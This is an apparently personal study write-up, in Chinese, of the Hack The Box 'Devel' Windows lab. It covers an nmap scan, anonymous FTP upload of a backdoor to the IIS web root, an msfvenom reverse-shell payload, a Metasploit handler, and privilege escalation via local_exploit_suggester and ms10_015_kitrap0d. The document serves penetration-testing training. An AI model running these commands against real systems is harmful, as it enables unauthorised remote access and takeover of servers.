【Hack The Box】windows练习-- devel
HTB 学习笔记
【Hack The Box】windows练习-- devel
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月28日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
文章目录
- HTB 学习笔记
- 信息收集
- ftp枚举
- 后门植入
- 生成payload
- msf利用
- 提权
信息收集
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-28 08:24 EDT
Nmap scan report for 10.129.6.232
Host is up (0.67s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
ftp允许匿名登陆
还有一个80页面
ftp枚举
匿名登陆
Anonymous
发现有一个图片,get下载到本地之后发现
就是80页面的首页
那就试试上传,看能不能直接上传上去一个后门
后门植入
成功上传,那接下来就生成payload
生成payload
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
这里之所以生成aspx的后门文件是因为使用了iis文件
成功上传(这里注意,要清楚自己设置的什么端口)
但是可以看到我们自己做的shell完全执行不了命令,linux中常用的几个稳定反弹shell的方法都用不了了,但是我不想用msf,因为这不利于我的oscp考试,于是我试图不利用msfvenom生成payload,但是这台机器中很多语言都没有(几乎没有任何语言。而针对于windows的shell门类我还欠缺很多)太遗憾了,只能使用msf接受shell了
msf利用
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
设置LHOST LPORT
然后run
然后去web访问一下那个aspx文件
提权
然后拿到shell
这里我认为完全可以上传winpeas等来枚举信息然后利用漏洞提权
但是我真的不知道有哪些脚本可以起到这个作用,我是一个windows新手
所以就简单的利用msf来提权了
这个靶场我会再做一次的
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
use post/multi/recon/local_exploit_suggester
use exploit/windows/local/ms10_015_kitrap0d
然后run即可